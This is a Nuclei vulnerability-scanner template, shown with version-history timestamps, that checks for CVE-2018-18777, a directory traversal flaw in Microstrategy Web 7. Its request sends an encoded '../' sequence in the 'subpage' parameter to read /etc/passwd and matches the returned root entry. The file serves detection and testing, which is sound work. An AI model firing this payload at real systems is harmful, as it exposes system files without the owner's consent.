nuclei-templates/cves/2018/CVE-2018-18777.yaml

34 lines
1.0 KiB
YAML
Raw Normal View History

2021-06-20 10:26:27 +00:00
id: CVE-2018-18777
info:
name: Path traversal vulnerability in Microstrategy Web version 7
author: 0x_Akoko
severity: medium
2021-08-29 06:42:18 +00:00
description: |
2021-08-29 09:14:12 +00:00
Directory traversal vulnerability in Microstrategy Web, version 7, in "/WebMstr7/servlet/mstrWeb" (in the parameter subpage)
allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /..
2021-08-29 06:42:18 +00:00
(slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product.
2021-06-20 10:26:27 +00:00
reference: https://www.exploit-db.com/exploits/45755
tags: microstrategy,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.30
cve-id: CVE-2018-18777
cwe-id: CWE-22
2021-06-20 10:26:27 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0"
2021-06-20 10:26:27 +00:00
- type: status
status:
- 200